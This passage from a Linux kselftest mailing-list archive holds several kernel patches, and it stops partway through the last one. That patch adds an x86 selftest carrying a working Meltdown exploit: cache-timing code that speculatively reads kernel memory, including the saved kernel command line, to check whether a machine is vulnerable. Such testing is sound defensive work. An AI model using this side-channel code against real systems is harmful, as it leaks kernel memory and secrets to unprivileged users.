- Linux-kselftest-mirror - lists.linaro.org

[PATCH v2 0/3] Checkpoint Support for Syscall User Dispatch

by Gregory Price

v2: Implements the getter/setter interface in ptrace rather than prctl Syscall user dispatch makes it possible to cleanly intercept system calls from user-land. However, most transparent checkpoint software presently leverages some combination of ptrace and system call injection to place software in a ready-to-checkpoint state. If Syscall User Dispatch is enabled at the time of being quiesced, injected system calls will subsequently be interposed upon and dispatched to the task's signal handler. This patch set implements 3 features to enable software such as CRIU to cleanly interpose upon software leveraging syscall user dispatch. - Implement PTRACE_O_SUSPEND_SYSCALL_USER_DISPATCH, akin to a similar feature for SECCOMP. This allows a ptracer to temporarily disable syscall user dispatch, making syscall injection possible. - Implement an fs/proc extension that reports whether Syscall User Dispatch is being used in proc/status. A similar value is present for SECCOMP, and is used to determine whether special logic is needed during checkpoint/resume. - Implement a getter interface for Syscall User Dispatch config info. To resume successfully, the checkpoint/resume software has to save and restore this information. Presently this configuration is write-only, with no way for C/R software to save it. This was done in ptrace because syscall user dispatch is not part of uapi. The syscall_user_dispatch_config structure was added to the ptrace exports. Signed-off-by: Gregory Price <gregory.price(a)memverge.com> Gregory Price (3): ptrace,syscall_user_dispatch: Implement Syscall User Dispatch Suspension fs/proc/array: Add Syscall User Dispatch to proc status ptrace,syscall_user_dispatch: add a getter/setter for sud configuration .../admin-guide/syscall-user-dispatch.rst | 5 +- fs/proc/array.c | 8 +++ include/linux/ptrace.h | 2 + include/linux/syscall_user_dispatch.h | 19 +++++++ include/uapi/linux/ptrace.h | 16 +++++- kernel/entry/syscall_user_dispatch.c | 54 +++++++++++++++++++ kernel/ptrace.c | 14 +++++ 7 files changed, 116 insertions(+), 2 deletions(-) -- 2.39.0

2 years, 5 months

4
9
0 0

[PATCH V2] tools/testing/kunit/kunit.py: remove redundant double check

by Alexander Pantyukhin

The build_tests function contained double checking for not success result. It is fixed in the current patch. Additional small simplifications of code like using ternary if were applied (avoid using the same operation by calculation times differ in two places). Signed-off-by: Alexander Pantyukhin <apantykhin(a)gmail.com> --- tools/testing/kunit/kunit.py | 19 +++++-------------- 1 file changed, 5 insertions(+), 14 deletions(-) diff --git a/tools/testing/kunit/kunit.py b/tools/testing/kunit/kunit.py index 43fbe96318fe..0e3e08cc0204 100755 --- a/tools/testing/kunit/kunit.py +++ b/tools/testing/kunit/kunit.py @@ -77,11 +77,8 @@ def config_tests(linux: kunit_kernel.LinuxSourceTree, config_start = time.time() success = linux.build_reconfig(request.build_dir, request.make_options) config_end = time.time() - if not success: - return KunitResult(KunitStatus.CONFIG_FAILURE, - config_end - config_start) - return KunitResult(KunitStatus.SUCCESS, - config_end - config_start) + status = KunitStatus.SUCCESS if success else KunitStatus.CONFIG_FAILURE + return KunitResult(status, config_end - config_start) def build_tests(linux: kunit_kernel.LinuxSourceTree, request: KunitBuildRequest) -> KunitResult: @@ -92,14 +89,8 @@ def build_tests(linux: kunit_kernel.LinuxSourceTree, request.build_dir, request.make_options) build_end = time.time() - if not success: - return KunitResult(KunitStatus.BUILD_FAILURE, - build_end - build_start) - if not success: - return KunitResult(KunitStatus.BUILD_FAILURE, - build_end - build_start) - return KunitResult(KunitStatus.SUCCESS, - build_end - build_start) + status = KunitStatus.SUCCESS if success else KunitStatus.BUILD_FAILURE + return KunitResult(status, build_end - build_start) def config_and_build_tests(linux: kunit_kernel.LinuxSourceTree, request: KunitBuildRequest) -> KunitResult: @@ -145,7 +136,7 @@ def exec_tests(linux: kunit_kernel.LinuxSourceTree, request: KunitExecRequest) - tests = _list_tests(linux, request) if request.run_isolated == 'test': filter_globs = tests - if request.run_isolated == 'suite': + elif request.run_isolated == 'suite': filter_globs = _suites_from_test_list(tests) # Apply the test-part of the user's glob, if present. if '.' in request.filter_glob: -- 2.25.1

2 years, 5 months

2
1
0 0

[PATCH] kunit: Export kunit_running()

by Arnd Bergmann

From: Arnd Bergmann <arnd(a)arndb.de> Using kunit_fail_current_test() in a loadable module causes a link error like: ERROR: modpost: "kunit_running" [drivers/gpu/drm/vc4/vc4.ko] undefined! Export the symbol to allow using it from modules. Fixes: da43ff045c3f ("drm/vc4: tests: Fail the current test if we access a register") Signed-off-by: Arnd Bergmann <arnd(a)arndb.de> --- lib/kunit/test.c | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/kunit/test.c b/lib/kunit/test.c index c9ebf975e56b..890ba5b3a981 100644 --- a/lib/kunit/test.c +++ b/lib/kunit/test.c @@ -21,6 +21,7 @@ #include "try-catch-impl.h" DEFINE_STATIC_KEY_FALSE(kunit_running); +EXPORT_SYMBOL_GPL(kunit_running); #if IS_BUILTIN(CONFIG_KUNIT) /* -- 2.39.0

2 years, 5 months

3
3
0 0

[PATCH v2] lib/hashtable_test.c: add test for the hashtable structure

by Rae Moar

Add a KUnit test for the kernel hashtable implementation in include/linux/hashtable.h. Note that this version does not yet test each of the rcu alternative versions of functions. Signed-off-by: Rae Moar <rmoar(a)google.com> --- Changes since v1: - Change Kconfig.debug message to be more succinct. - Directly increment current element's visited field rather than looking up corresponding element. - Use KUNIT_EXPECT_… statements to check keys are within range rather than using if statements. - Change hash_for_each_possible test to check buckets using a hash_for_each method instead of calculating the bucket number using hash_min. Note: The check patch script is outputting open brace errors on lines 158, 192, 247 of lib/hashtable_test.c. However, I think these errors are a mistake as the format of the braces on those lines seems consistent with the Linux Kernel style guide. lib/Kconfig.debug | 13 ++ lib/Makefile | 1 + lib/hashtable_test.c | 326 +++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 340 insertions(+) create mode 100644 lib/hashtable_test.c diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug index 881c3f84e88a..69b1452a3eeb 100644 --- a/lib/Kconfig.debug +++ b/lib/Kconfig.debug @@ -2496,6 +2496,19 @@ config LIST_KUNIT_TEST If unsure, say N. +config HASHTABLE_KUNIT_TEST + tristate "KUnit Test for Kernel Hashtable structures" if !KUNIT_ALL_TESTS + depends on KUNIT + default KUNIT_ALL_TESTS + help + This builds the hashtable KUnit test suite. + It tests the basic functionality of the API defined in + include/linux/hashtable.h. For more information on KUnit and + unit tests in general please refer to the KUnit documentation + in Documentation/dev-tools/kunit/. + + If unsure, say N. + config LINEAR_RANGES_TEST tristate "KUnit test for linear_ranges" depends on KUNIT diff --git a/lib/Makefile b/lib/Makefile index 4d9461bfea42..5f8efbe8e97f 100644 --- a/lib/Makefile +++ b/lib/Makefile @@ -369,6 +369,7 @@ obj-$(CONFIG_PLDMFW) += pldmfw/ CFLAGS_bitfield_kunit.o := $(DISABLE_STRUCTLEAK_PLUGIN) obj-$(CONFIG_BITFIELD_KUNIT) += bitfield_kunit.o obj-$(CONFIG_LIST_KUNIT_TEST) += list-test.o +obj-$(CONFIG_HASHTABLE_KUNIT_TEST) += hashtable_test.o obj-$(CONFIG_LINEAR_RANGES_TEST) += test_linear_ranges.o obj-$(CONFIG_BITS_TEST) += test_bits.o obj-$(CONFIG_CMDLINE_KUNIT_TEST) += cmdline_kunit.o diff --git a/lib/hashtable_test.c b/lib/hashtable_test.c new file mode 100644 index 000000000000..ab09b747d83d --- /dev/null +++ b/lib/hashtable_test.c @@ -0,0 +1,326 @@ +// SPDX-License-Identifier: GPL-2.0 +/* + * KUnit test for the Kernel Hashtable structures. + * + * Copyright (C) 2022, Google LLC. + * Author: Rae Moar <rmoar(a)google.com> + */ +#include <kunit/test.h> + +#include <linux/hashtable.h> + +struct hashtable_test_entry { + int key; + int data; + struct hlist_node node; + int visited; +}; + +static void hashtable_test_hash_init(struct kunit *test) +{ + /* Test the different ways of initialising a hashtable. */ + DEFINE_HASHTABLE(hash1, 3); + DECLARE_HASHTABLE(hash2, 3); + + hash_init(hash1); + hash_init(hash2); + + KUNIT_EXPECT_TRUE(test, hash_empty(hash1)); + KUNIT_EXPECT_TRUE(test, hash_empty(hash2)); +} + +static void hashtable_test_hash_empty(struct kunit *test) +{ + struct hashtable_test_entry a; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + KUNIT_EXPECT_TRUE(test, hash_empty(hash)); + + a.key = 1; + a.data = 13; + hash_add(hash, &a.node, a.key); + + /* Hashtable should no longer be empty. */ + KUNIT_EXPECT_FALSE(test, hash_empty(hash)); +} + +static void hashtable_test_hash_hashed(struct kunit *test) +{ + struct hashtable_test_entry a, b; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + a.key = 1; + a.data = 13; + b.key = 1; + b.data = 2; + + hash_add(hash, &a.node, a.key); + hash_add(hash, &b.node, b.key); + + KUNIT_EXPECT_TRUE(test, hash_hashed(&a.node)); + KUNIT_EXPECT_TRUE(test, hash_hashed(&b.node)); +} + +static void hashtable_test_hash_add(struct kunit *test) +{ + struct hashtable_test_entry a, b, *x; + int bkt; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + a.key = 1; + a.data = 13; + a.visited = 0; + b.key = 2; + b.data = 10; + b.visited = 0; + + hash_add(hash, &a.node, a.key); + hash_add(hash, &b.node, b.key); + + hash_for_each(hash, bkt, x, node) { + x->visited++; + if (x->key == a.key) + KUNIT_EXPECT_EQ(test, x->data, 13); + else if (x->key == b.key) + KUNIT_EXPECT_EQ(test, x->data, 10); + else + KUNIT_FAIL(test, "Unexpected key in hashtable."); + } + + /* Both entries should have been visited exactly once. */ + KUNIT_EXPECT_EQ(test, a.visited, 1); + KUNIT_EXPECT_EQ(test, b.visited, 1); +} + +static void hashtable_test_hash_del(struct kunit *test) +{ + struct hashtable_test_entry a, b, *x; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + a.key = 1; + a.data = 13; + b.key = 2; + b.data = 10; + b.visited = 0; + + hash_add(hash, &a.node, a.key); + hash_add(hash, &b.node, b.key); + + hash_del(&b.node); + hash_for_each_possible(hash, x, node, b.key) { + x->visited++; + KUNIT_EXPECT_NE(test, x->key, b.key); + } + + /* The deleted entry should not have been visited. */ + KUNIT_EXPECT_EQ(test, b.visited, 0); + + hash_del(&a.node); + + /* The hashtable should be empty. */ + KUNIT_EXPECT_TRUE(test, hash_empty(hash)); +} + +static void hashtable_test_hash_for_each(struct kunit *test) +{ + struct hashtable_test_entry entries[3]; + struct hashtable_test_entry *x; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = i; + entries[i].data = i + 10; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + count = 0; + hash_for_each(hash, bkt, x, node) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->key, 0); + KUNIT_ASSERT_LT(test, x->key, 3); + count++; + } + + /* Should have visited each entry exactly once. */ + KUNIT_EXPECT_EQ(test, count, 3); + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); +} + +static void hashtable_test_hash_for_each_safe(struct kunit *test) +{ + struct hashtable_test_entry entries[3]; + struct hashtable_test_entry *x; + struct hlist_node *tmp; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = i; + entries[i].data = i + 10; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + count = 0; + hash_for_each_safe(hash, bkt, tmp, x, node) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->key, 0); + KUNIT_ASSERT_LT(test, x->key, 3); + count++; + + /* Delete entry during loop. */ + hash_del(&x->node); + } + + /* Should have visited each entry exactly once. */ + KUNIT_EXPECT_EQ(test, count, 3); + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); +} + +static void hashtable_test_hash_for_each_possible(struct kunit *test) +{ + struct hashtable_test_entry entries[4]; + struct hashtable_test_entry *x, *y; + int buckets[2]; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries with key = 0. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = 0; + entries[i].data = i; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + /* Add an entry with key = 1. */ + entries[3].key = 1; + entries[3].data = 3; + entries[3].visited = 0; + hash_add(hash, &entries[3].node, entries[3].key); + + count = 0; + hash_for_each_possible(hash, x, node, 0) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->data, 0); + KUNIT_ASSERT_LT(test, x->data, 4); + count++; + } + + /* Should have visited each entry with key = 0 exactly once. */ + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); + + /* Save the buckets for the different keys. */ + hash_for_each(hash, bkt, y, node) { + if (y->key < 0 || y->key > 1) + KUNIT_ASSERT_FAILURE(test, "Unexpected key in hashtable."); + buckets[y->key] = bkt; + } + + /* If entry with key = 1 is in the same bucket as the entries with + * key = 0, check it was visited. Otherwise ensure that only three + * entries were visited. + */ + if (buckets[0] == buckets[1]) { + KUNIT_EXPECT_EQ(test, count, 4); + KUNIT_EXPECT_EQ(test, entries[3].visited, 1); + } else { + KUNIT_EXPECT_EQ(test, count, 3); + KUNIT_EXPECT_EQ(test, entries[3].visited, 0); + } +} + +static void hashtable_test_hash_for_each_possible_safe(struct kunit *test) +{ + struct hashtable_test_entry entries[4]; + struct hashtable_test_entry *x, *y; + struct hlist_node *tmp; + int buckets[2]; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries with key = 0. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = 0; + entries[i].data = i; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + /* Add an entry with key = 1. */ + entries[3].key = 1; + entries[3].data = 3; + entries[3].visited = 0; + hash_add(hash, &entries[3].node, entries[3].key); + + count = 0; + hash_for_each_possible_safe(hash, x, tmp, node, 0) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->data, 0); + KUNIT_ASSERT_LT(test, x->data, 4); + count++; + + /* Delete entry during loop. */ + hash_del(&x->node); + } + + /* Should have visited each entry with key = 0 exactly once. */ + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); + + /* Save the buckets for the different keys. */ + hash_for_each(hash, bkt, y, node) { + if (y->key < 0 || y->key > 1) + KUNIT_ASSERT_FAILURE(test, "Unexpected key in hashtable."); + buckets[y->key] = bkt; + } + + /* If entry with key = 1 is in the same bucket as the entries with + * key = 0, check it was visited. Otherwise ensure that only three + * entries were visited. + */ + if (buckets[0] == buckets[1]) { + KUNIT_EXPECT_EQ(test, count, 4); + KUNIT_EXPECT_EQ(test, entries[3].visited, 1); + } else { + KUNIT_EXPECT_EQ(test, count, 3); + KUNIT_EXPECT_EQ(test, entries[3].visited, 0); + } +} + +static struct kunit_case hashtable_test_cases[] = { + KUNIT_CASE(hashtable_test_hash_init), + KUNIT_CASE(hashtable_test_hash_empty), + KUNIT_CASE(hashtable_test_hash_hashed), + KUNIT_CASE(hashtable_test_hash_add), + KUNIT_CASE(hashtable_test_hash_del), + KUNIT_CASE(hashtable_test_hash_for_each), + KUNIT_CASE(hashtable_test_hash_for_each_safe), + KUNIT_CASE(hashtable_test_hash_for_each_possible), + KUNIT_CASE(hashtable_test_hash_for_each_possible_safe), + {}, +}; + +static struct kunit_suite hashtable_test_module = { + .name = "hashtable", + .test_cases = hashtable_test_cases, +}; + +kunit_test_suites(&hashtable_test_module); + +MODULE_LICENSE("GPL"); base-commit: 88603b6dc419445847923fcb7fe5080067a30f98 -- 2.39.0.314.g84b9a713c41-goog

2 years, 5 months

2
1
0 0

[PATCH v2] selftest/x86/meltdown: Add a selftest for meltdown

by Aaron Lu

To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added. This selftest is based on https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test, only low kernel mapping leak is enough to trigger a test fail, so both tests are useful. Test results of 10 runs: On v6.1-rc8 with nopti kernel cmdline option: host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests. bdw=broadwell, hsw=haswell, ivb=ivybridge, etc. test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space. On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2. Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8. Main changes I made from ltp's meltdown test: - Replace rdtscll() and clflush() with kernel's implementation; - Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions; - Coding style changes: placing the function return type in the same line of the function. Signed-off-by: Aaron Lu <aaron.lu(a)intel.com> Reviewed-by: Pavel Boldin <boldin.pavel(a)gmail.com> --- v2: add Pavel Boldin's reviewed-by tag. tools/testing/selftests/x86/Makefile | 2 +- tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++ 2 files changed, 530 insertions(+), 1 deletion(-) create mode 100644 tools/testing/selftests/x86/meltdown.c diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \ - syscall_arg_fault fsgsbase_restore sigaltstack + syscall_arg_fault fsgsbase_restore sigaltstack meltdown TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..fcb211dc9038 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,529 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (c) 2018 Pavel Boldin <pboldin(a)cloudlinux.com> + * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… + */ + +#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdarg.h> +#include <string.h> +#include <signal.h> +#include <ucontext.h> +#include <unistd.h> +#include <fcntl.h> +#include <ctype.h> +#include <sys/utsname.h> +#include <sys/mman.h> + +#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1)) + +size_t cache_miss_threshold; +unsigned long directmap_base; + +#define TARGET_OFFSET 9 +#define TARGET_SIZE (1 << TARGET_OFFSET) +#define BITS_BY_READ 2 + +static inline uint64_t rdtsc(void) +{ + uint32_t eax, edx; + uint64_t tsc_val; + /* + * The lfence is to wait (on Intel CPUs) until all previous + * instructions have been executed. If software requires RDTSC to be + * executed prior to execution of any subsequent instruction, it can + * execute LFENCE immediately after RDTSC + * */ + __asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx)); + tsc_val = ((uint64_t)edx) << 32 | eax; + return tsc_val; +} + +static inline void clflush(volatile void *__p) +{ + asm volatile("clflush %0" : "+m" (*(volatile char *)__p)); +} + +static char target_array[BITS_BY_READ * TARGET_SIZE]; + +static void clflush_target(void) +{ + int i; + + for (i = 0; i < BITS_BY_READ; i++) + clflush(&target_array[i * TARGET_SIZE]); +} + +extern char failshere[]; +extern char stopspeculate[]; + +static void __attribute__((noinline)) speculate(unsigned long addr, char bit) +{ + register char mybit asm ("cl") = bit; +#ifdef __x86_64__ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%rax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%rax\n\t" + "and $1, %%rax\n\t" + "shl $9, %%rax\n\t" + "jz 1b\n\t" + + "movq (%[target], %%rax, 1), %%rbx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "rbx" + ); +#else /* defined(__x86_64__) */ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%eax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%eax\n\t" + "and $1, %%eax\n\t" + "shl $9, %%eax\n\t" + "jz 1b\n\t" + + "movl (%[target], %%eax, 1), %%ebx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "ebx" + ); +#endif +} + +#ifdef __i386__ +# define REG_RIP REG_EIP +#endif + +static void sigsegv(int sig, siginfo_t *siginfo, void *context) +{ + ucontext_t *ucontext = context; + unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP]; + if (*prip != (unsigned long)failshere) { + printf("Segmentation fault at unexpected location %lx\n", *prip); + abort(); + } + *prip = (unsigned long)stopspeculate; + return; +} + +static int set_signal(void) +{ + struct sigaction act = { + .sa_sigaction = sigsegv, + .sa_flags = SA_SIGINFO, + }; + + return sigaction(SIGSEGV, &act, NULL); +} + +static inline int get_access_time(volatile char *addr) +{ + unsigned long long time1, time2; + volatile int j __attribute__((__unused__)); + + time1 = rdtsc(); + j = *addr; + time2 = rdtsc(); + + return time2 - time1; +} + +static int cache_hit_threshold; +static int hist[BITS_BY_READ]; + +static void check(void) +{ + int i, time; + volatile char *addr; + + for (i = 0; i < BITS_BY_READ; i++) { + addr = &target_array[i * TARGET_SIZE]; + + time = get_access_time(addr); + + if (time <= cache_hit_threshold) + hist[i]++; + } +} + +#define CYCLES 10000 +static int readbit(int fd, unsigned long addr, char bit) +{ + int i, ret; + static char buf[256]; + + memset(hist, 0, sizeof(hist)); + + for (i = 0; i < CYCLES; i++) { + /* + * Make the to-be-stolen data cache and tlb hot + * to increase success rate. + */ + ret = pread(fd, buf, sizeof(buf), 0); + if (ret < 0) + printf("[INFO]\tCan't read fd"); + + clflush_target(); + + speculate(addr, bit); + check(); + } + + if (hist[1] > CYCLES / 10) + return 1; + return 0; +} + +static int readbyte(int fd, unsigned long addr) +{ + int bit, res = 0; + + for (bit = 0; bit < 8; bit ++ ) + res |= (readbit(fd, addr, bit) << bit); + + return res; +} + +static int mysqrt(long val) +{ + int root = val / 2, prevroot = 0, i = 0; + + while (prevroot != root && i++ < 100) { + prevroot = root; + root = (val / root + root) / 2; + } + + return root; +} + +#define ESTIMATE_CYCLES 1000000 +static void set_cache_hit_threshold(void) +{ + long cached, uncached, i; + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) { + clflush(target_array); + uncached += get_access_time(target_array); + } + + cached /= ESTIMATE_CYCLES; + uncached /= ESTIMATE_CYCLES; + + cache_hit_threshold = mysqrt(cached * uncached); + + printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n", + cached, uncached, cache_hit_threshold); +} + +static unsigned long find_symbol_in_file(const char *filename, const char *symname) +{ + unsigned long addr; + char type, *buf; + int found; + FILE *fp; + + fp = fopen(filename, "r"); + if (!fp) { + printf("[INFO]\tFailed to open %s\n", filename); + return 0; + } + + buf = malloc(4096); + if (!buf) + return 0; + + found = 0; + while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) { + if (!strcmp(buf, symname)) { + found = 1; + break; + } + } + + free(buf); + fclose(fp); + + return found ? addr : 0; +} + +static unsigned long find_kernel_symbol(const char *name) +{ + char systemmap[256]; + struct utsname utsname; + unsigned long addr; + + addr = find_symbol_in_file("/proc/kallsyms", name); + if (addr) + return addr; + + if (uname(&utsname) < 0) + return 0; + sprintf(systemmap, "/boot/System.map-%s", utsname.release); + addr = find_symbol_in_file(systemmap, name); + return addr; +} + +static unsigned long saved_cmdline_addr; +static int spec_fd; + +#define READ_SIZE 32 + +static int test_read_saved_command_line(void) +{ + unsigned int i, score = 0, ret; + unsigned long addr; + unsigned long size; + char read[READ_SIZE] = { 0 }; + char expected[READ_SIZE] = { 0 }; + int expected_len; + + saved_cmdline_addr = find_kernel_symbol("saved_command_line"); + if (!saved_cmdline_addr) { + printf("[SKIP]\tCan not find symbol saved_command_line\n"); + return 0; + } + printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr); + + spec_fd = open("/proc/cmdline", O_RDONLY); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open /proc/cmdline\n"); + return 0; + } + + expected_len = pread(spec_fd, expected, sizeof(expected), 0); + if (expected_len < 0) { + printf("[SKIP]\tCan't read /proc/cmdline\n"); + return 0; + } + + /* read address of saved_cmdline_addr */ + addr = saved_cmdline_addr; + size = sizeof(addr); + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + /* read value pointed to by saved_cmdline_addr */ + memcpy(&addr, read, sizeof(addr)); + memset(read, 0, sizeof(read)); + printf("[INFO]\tsaved_command_line: 0x%lx\n", addr); + size = expected_len; + + if (!addr) + goto done; + + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + for (i = 0; i < size; i++) + if (expected[i] == read[i]) + score++; + +done: + if (score > size / 2) { + printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n"); + ret = -1; + } else { + printf("[OK]\ttest_read_saved_command_line: no leak found.\n"); + ret = 0; + } + + close(spec_fd); + + return ret; +} + +static int get_directmap_base(void) +{ + char *buf; + FILE *fp; + size_t n; + int ret; + + fp = fopen("/sys/kernel/debug/page_tables/kernel", "r"); + if (!fp) + return -1; + + buf = NULL; + ret = -1; + while (getline(&buf, &n, fp) != -1) { + if (!strstr(buf, "Kernel Mapping")) + continue; + + if (getline(&buf, &n, fp) != -1 && + sscanf(buf, "0x%lx", &directmap_base) == 1) { + printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK); + directmap_base &= PUD_MASK; + ret = 0; + break; + } + } + + fclose(fp); + free(buf); + return ret; +} + +static int virt_to_phys(unsigned long virt, unsigned long *phys) +{ + unsigned long pfn; + uint64_t val; + int fd, ret; + + fd = open("/proc/self/pagemap", O_RDONLY); + if (fd == -1) { + printf("[INFO]\tFailed to open pagemap\n"); + return -1; + } + + ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t)); + if (ret == -1) { + printf("[INFO]\tFailed to read pagemap\n"); + goto out; + } + + if (!(val & (1ULL << 63))) { + printf("[INFO]\tPage not present according to pagemap\n"); + ret = -1; + goto out; + } + + pfn = val & ((1ULL << 55) - 1); + if (pfn == 0) { + printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n"); + ret = -1; + goto out; + } + + ret = 0; + *phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1)); + +out: + close(fd); + return ret; +} + +static int test_read_local_var(void) +{ + char path[] = "/tmp/meltdown.XXXXXX"; + char string[] = "test string"; + unsigned long phys; + int i, len, ret; + char *result; + void *p; + + if (get_directmap_base() == -1) { + printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n"); + return 0; + } + + spec_fd = mkstemp(path); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open %s\n", path); + return 0; + } + ftruncate(spec_fd, 0x1000); + + p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0); + if (p == MAP_FAILED) { + printf("[SKIP]\tmmap spec_fd failed\n"); + return 0; + } + memcpy(p, string, sizeof(string)); + + if (virt_to_phys((unsigned long)p, &phys) == -1) { + printf("[SKIP]\tCan not convert virtual address to physical address\n"); + return 0; + } + + len = strlen(string); + result = malloc(len + 1); + if (!result) { + printf("[SKIP]\tNot enough memory for malloc\n"); + return 0; + } + memset(result, 0, len + 1); + + for (i = 0; i < len; i++, phys++) { + result[i] = readbyte(spec_fd, directmap_base + phys); + if (result[i] == 0) + break; + } + + ret = !strncmp(string, result, len); + if (ret) + printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n"); + else + printf("[OK]\ttest_read_local_var: no leak found.\n"); + + free(result); + munmap(p, 0x1000); + close(spec_fd); + + return ret; +} + +int main(void) +{ + int ret1, ret2; + + printf("[RUN]\tTest if system is vulnerable to meltdown\n"); + + set_cache_hit_threshold(); + + memset(target_array, 1, sizeof(target_array)); + + if (set_signal() < 0) { + printf("[SKIP]\tCan not set handler for segfault\n"); + return 0; + } + + ret1 = test_read_local_var(); + ret2 = test_read_saved_command_line(); + + if (ret1 || ret2) + return -1; + + 